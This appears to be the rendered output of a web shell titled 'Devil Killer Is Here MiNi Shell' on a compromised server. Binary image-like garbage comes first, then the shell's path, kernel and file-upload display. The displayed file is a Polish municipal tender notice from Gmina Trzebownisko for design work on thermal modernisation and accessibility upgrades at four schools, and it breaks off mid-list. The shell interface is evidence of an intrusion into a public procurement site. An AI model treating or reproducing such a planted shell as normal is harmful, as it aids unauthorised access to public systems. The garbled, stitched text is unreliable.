JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250207/0009409901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie kompleksowych dokumentacji projektowych na przebudowę<br/>i modernizację budynków szkół w ramach zadania pn. „Termomodernizacja Szkół na terenie Gminy Trzebownisko.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Trzebownisko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582157</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Trzebownisko 976</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzebownisko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-001</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">177713700</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">177713719</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@trzebownisko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://trzebownisko.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie kompleksowych dokumentacji projektowych na przebudowę<br/>i modernizację budynków szkół w ramach zadania pn. „Termomodernizacja Szkół na terenie Gminy Trzebownisko.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dbd673c4-7856-43dd-b8b9-fac9dba2c5c6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00094099</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00070715/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Termomodernizacja Szkół na terenie Gminy Trzebownisko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/trzebownisko <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/trzebownisko</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcą odbywa się za pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/trzebownisko.Wymaga się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania(wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający będzie przekazywanie wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji &#34;Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy. Ofertę oraz dokumenty i oświadczenia składane wraz z ofertą, jak również wszelkie dokumenty i oświadczenia składane w trakcie postępowania, należy składać w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 poz. 2415).5. Pełne informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej zawarto w pkt XII i XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Gmina Trzebownisko, 36-001 Trzebownisko 976, nr tel. 17 77-13-700.<br/>2. administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem email: daneosobowe@trzebownisko.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym.<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74ustawy PZP<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust.1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany ,stosownie do art. 22 RODO.<br/><br/>Pełna treść klauzulii informacyjnej znajduje się w pkt XXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BR.271.1.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 864600,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na wykonaniu, opracowaniu kompleksowych dokumentacji projektowych na przebudowę i modernizację budynków szkół na terenie Gminy Trzebownisko w ramach zadania pn. „Termomodernizacja Szkół na terenie Gminy Trzebownisko.” <br/>Zadanie obejmuje opracowanie dokumentacji projektowych dla szkół:<br/>•	Część 1- Wykonanie dwóch odrębnych dokumentacji projektowych dla:<br/>1.1	Szkoły Podstawowej w Trzebownisku <br/>1.2	Zespołu Szkół w Nowej Wsi<br/><br/><br/>- Szczegółowy opis przedmiotu zamówienia:<br/>1)	Część 1<br/>1.1	Szkoła Podstawowa w Trzebownisku – zaprojektowanie wykonania robót budowlanych polegających na termomodernizacji budynku oraz przebudowa, rozbudowa budynku w celu zapewnienia dostępności architektonicznej i informacyjno-komunikacyjnej z różnymi potrzebami w szczególności osobom z niepełnosprawnościami. Projekt robót należy wykonać w oparciu o zasady uniwersalnego projektowania. Dokładniejszy zakres opisany w załącznikach do SWZ (audyt efektywności energetycznej i audyt energetyczny, model dostępnej szkoły (https://www.dostepnaszkola.info/ ) i raport z audytu w sprawie dostępności) wraz z wymaganiami poniżej:<br/>•	Modernizacja ścian zewnętrznych i wewnętrznych- docieplenie<br/>•	Modernizacja systemu ciepłej wody użytkowej- przebudowa instalacji<br/>•	Modernizacja przegród zewnętrznych – okien i drzwi- wymiana stolarki <br/>•	Modernizacja przegród- stropy- docieplenie<br/>•	Modernizacja systemu grzewczego- przebudowa instalacji i kotłowni<br/>•	Instalacja min. 35kW<br/>•	Wymiana źródeł oświetlenia<br/>•	Rozbudowa budynku o dodatkową klatkę schodową wraz z windą w celu zapewnienia dostępności dla osób z niepełnosprawnościami<br/>•	Przebudowa budynku i modernizacja budynku w celu zapewnienia dostępności dla osób z niepełnosprawnościami np. poruszających się na wózkach inwalidzkich, osób niedosłyszących i niedowidzących- zapewnienie szerokości drzwi, przejść itp. na całości budynku,<br/>•	Przebudowa i remont istniejących instalacji w budynku szkoły: wody, kanalizacji,<br/>•	Przebudowa i wykonanie nowych instalacji elektrycznych i instalacji niskoprądowych<br/>•	Przebudowa istniejących sanitariatów,<br/>•	Remont piwnic- likwidacja wilgoci na ścianach i posadzkach,<br/>•	Zaprojektowanie w salach lekcyjnych klimatyzacji,<br/>•	Zaprojektowanie systemu zarzadzania budynkiem,<br/>•	Zagospodarowanie terenu wokół budynku utwardzenia, elementy małej architektury, zieleń itp.<br/>•	Modernizacja sali gimnastycznej wraz z zapleczem sanitarnym i szatniami,<br/>•	Oznakowanie komunikacyjne budynku ( tj. oznaczenia sal, pomieszczeń )<br/>•	Dokumentacja ma być tak przygotowana, aby można było zlecać roboty etapami.<br/><br/>1.2	Zespół Szkół w Nowej Wsi – – zaprojektowanie wykonania robót budowlanych polegających na termomodernizacji budynku oraz przebudowa, rozbudowa budynku w celu zapewnienia dostępności architektonicznej i informacyjno-komunikacyjnej z różnymi potrzebami w szczególności osobom z niepełnosprawnościami. Projekt robót należy wykonać w oparciu o zasady uniwersalnego projektowania. Dokładniejszy zakres opisany w załącznikach do SWZ (audyt efektywności energetycznej i audyt energetyczny, model dostępnej szkoły (https://www.dostepnaszkola.info/ )) wraz z wymaganiami poniżej:<br/>•	modernizacja systemu grzewczego<br/>•	docieplenie ścian<br/>•	docieplenie stropów<br/>•	wymiana stolarki zewnętrznej<br/>•	modernizacja instalacji ciepłej wody użytkowej <br/>•	mikroinstalacja min. 40KW<br/>•	Wymiana źródeł oświetlenia<br/>•	Budowa windy z ewentualną klatką schodową w celu zapewnienia dostępności dla osób z niepełnosprawnościami. <br/>•	Przebudowa budynku i modernizacja budynku w celu zapewnienia dostępności dla osób z niepełnosprawnościami np. poruszających się na wózkach inwalidzkich, osób niedosłyszących i niedowidzących,<br/>•	Przebudowa i remont istniejących instalacji w budynku szkoły: wody, kanalizacji,<br/>•	Przebudowa i wykonanie nowych instalacji elektrycznych i instalacji niskoprądowych,<br/>•	Modernizacja istniejących sanitariatów,<br/>•	Remont piwnic- likwidacja wilgoci na ścianach i posadzkach,<br/>•	Zaprojektowanie w salach lekcyjnych klimatyzacji,<br/>•	Zaprojektowanie systemu zarzadzania budynkiem<br/>•	Modernizacja Sali gimnastycznej wraz z zapleczem sanitarnym i szatniami<br/>•	Modernizacja istniejącej kuchni – zaprojektowanie nowej technologii kuchni wraz z wyposażeniem (nowe instalacje w tym wentylacja, nowe okładziny itp.)<br/>•	Zagospodarowanie terenu wokół budynku utwardzenia, elementy małej architektury, zieleń itp.<br/>•	Oznakowanie komunikacyjne budynku ( tj. oznaczenia sal, pomieszczeń )<br/>•	Dokumentacja ma być tak przygotowana, aby można było zlecać roboty etapami.<br/><br/>Wymagania do każdej części dokumentacji:<br/>1)	Wykonanie inwentaryzacji budynków,<br/>2)	Ilości sal i innych pomieszczeń nie mogą ulec zmniejszeniu,<br/>3)	Rozdzielenie kosztorysów inwestorskich na poszczególne etapy: termomodernizacja, dostosowanie obiektów dla osób o szczególnych potrzebach w niezbędnym zakresie, dostosowanie obiektów dla osób o szczególnych potrzebach kompleksowo, roboty pozostałe,<br/>4)	Zastosowanie materiałów estetycznych, trwałych, odpornych na warunki atmosferyczne, łatwych do czyszczenia i konserwacji, funkcjonalnych - stosownych do funkcji obiektu,<br/>5)	Stosowanie rozwiązań zapewniających optymalne użytkowanie obiektów w przyszłości,<br/>6)	Zaprojektować aranżacje szatni, korytarzy, łazienek i nowych pomieszczeń (projekt posadzek wraz kolorami, projekt ścian, dobór kolorów, materiałów, rozkład mebli), <br/>7)	Część tekstowa dokumentacji projektowej musi być wykonana zgodnie z wytycznymi WCAG 2.1 zawartymi w załączniku do Ustawy z dnia 4 kwietnia 2019 r. o dostępności cyfrowej stron internetowych i aplikacji mobilnych podmiotów publicznych.<br/>8)	Wykonawca, poza plikami do odczytu i wydruku, przekaże zamawiającemu pliki edytowalne projektu, zapisane w formacie programu w którym był realizowany projekt. <br/>9)	Szkoły mają być dostępne dla osób o szczególnych potrzebach, przy wykonywaniu dokumentacji należy opierać się na:<br/>- Modelu dostępnej szkoły: plik jako załącznik do SWZ, model dostępny z a komentarzami na stronie: https://www.dostepnaszkola.info/model-dostepnej-szkoly/<br/>- Raportach z audytów przeprowadzonych w szkołach<br/>10)	Wszystkie rozwiązania techniczne, architektoniczne oraz funkcjonalne należy uzgodnić z Zamawiającym.<br/>11)	Zakończenie instalacji wewnętrznych należy ująć w projektach wykonawczych,<br/>12)	Dokumentacja będzie posiadać wszystkie wymagane uzgodnienia i oświadczenie wykonawcy, że projekt został wykonany zgodnie z wymaganiami i obowiązującymi przepisami oraz jest kompletny z punktu celu, któremu ma służyć. Zakres zamówienia obejmuje uzyskania wszelkich decyzji, pozwoleń, uzgodnień, opinii, ekspertyz oraz zgłoszeń, niezbędnych do wykonania robót budowlanych, Każdy egzemplarz dokumentacji powinien być oprawiony, trwale zszyty mieć ponumerowane strony i rysunki. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 393000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">365 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca składając ofertę składa oświadczenie, że Wykonawca nie podlega wykluczeniu.<br/>Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny -100%- oddzielnie dla części 1 i części 2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na wykonaniu, opracowaniu kompleksowych dokumentacji projektowych na przebudowę i modernizację budynków szkół na terenie Gminy Trzebownisko w ramach zadania pn. „Termomodernizacja Szkół na terenie Gminy Trzebownisko.” <br/>Zadanie obejmuje opracowanie dokumentacji projektowych dla szkół:<br/><br/><br/>•	Część 2- Wykonanie dwóch odrębnych dokumentacji projektowych dla:<br/>2.1	Zespołu Szkół w Łące <br/>2.2 Zespołu Szkół w Łukawcu<br/><br/><br/>2)	Część 2<br/><br/>2.1	Zespół Szkół w Łące – zaprojektowanie wykonania robót budowlanych polegających na termomodernizacji budynku oraz przebudowa, rozbudowa budynku w celu zapewnienia dostępności architektonicznej i informacyjno-komunikacyjnej z różnymi potrzebami w szczególności osobom z niepełnosprawnościami. Projekt robót należy wykonać w oparciu o zasady uniwersalnego projektowania. Dokładniejszy zakres opisany w załącznikach do SWZ (audyt efektywności energetycznej i audyt energetyczny, model dostępnej szkoły (https://www.dostepnaszkola.info/ ) i raport z audytu w sprawie dostępności) wraz z wymaganiami poniżej:<br/>•	Modernizacja systemu ciepłej wody użytkowej<br/>•	Modernizacja ścian zewnętrznych<br/>•	Modernizacja przegród zewnętrznych – okien i drzwi<br/>•	Modernizacja przegród- stropy<br/>•	Modernizacja systemu grzewczego<br/>•	Instalacja min. 40kW<br/>•	Wymiana źródła oświetlenia<br/>•	Budowa windy z ewentualną klatką schodową w celu zapewnienia dostępności dla osób z niepełnosprawnościami. <br/>•	Przebudowa budynku i modernizacja budynku w celu zapewnienia dostępności dla osób z niepełnosprawnościami np. poruszających się na wózkach inwalidzkich, osób niedosłyszących i niedowidzących<br/>•	Przebudowa i remont istniejących instalacji w budynku szkoły: wody, kanalizacji,<br/>•	Przebudowa instalacji elektrycznych,<br/>•	Modernizacja istniejących sanitariatów,<br/>•	Remont piwnic- likwidacja wilgoci na ścianach i posadzkach,<br/>•	Zaprojektowanie w salach lekcyjnych klimatyzacji,<br/>•	Zaprojektowanie systemu zarzadzania budynkiem<br/>•	Zagospodarowanie terenu wokół budynku, utwardzenia elementy małej architektury, zieleń itp.<br/>•	Modernizacja Sali gimnastycznej wraz z zapleczem sanitarnym i szatniami<br/>•	Zaprojektowanie zabudowy podcienia wejścia skrzydła wschodniego budynku <br/>•	Oznakowanie komunikacyjne budynku ( tj. oznaczenia sal, pomieszczeń )<br/>•	Wyremontowanie pomieszczeń piętra skrzydła wschodniego- oddzielny etap (projekt wykonawczy, kosztorysy i przedmiary)<br/>•	Modernizacja istniejącej kuchni – zaprojektowanie nowej technologii kuchni wraz z wyposażeniem (nowe instalacje, okładziny itp.), przebudowa wentylacji mechanicznej, instalacji na kanalizacji i innych instalacji w tym elektrycznych<br/>•	Dokumentacja ma być tak przygotowana, aby można było zlecać roboty etapami.<br/><br/>2.2	Zespół Szkół w Łukawcu – zaprojektowanie wykonania robót budowlanych polegających na termomodernizacji budynku oraz przebudowa, rozbudowa budynku w celu zapewnienia dostępności architektonicznej i informacyjno-komunikacyjnej z różnymi potrzebami w szczególności osobom z niepełnosprawnościami. Projekt robót należy wykonać w oparciu o zasady uniwersalnego projektowania. Dokładniejszy zakres opisany w załącznikach do SWZ (audyt efektywności energetycznej i audyt energetyczny, model dostępnej szkoły (https://www.dostepnaszkola.info/ ) i raport z audytu w sprawie dostępności) wraz z wymaganiami poniżej:<br/>•	wymiana oświetlenia<br/>•	modernizacja systemu grzewczego<br/>•	docieplenie ścian,<br/>•	docieplenie stropów,<br/>•	wymiana stolarki zewnętrznej<br/>•	modernizacja instalacji ciepłej wody użytkowej <br/>•	mikroinstalacja min. 35KW<br/>•	Budowa windy z 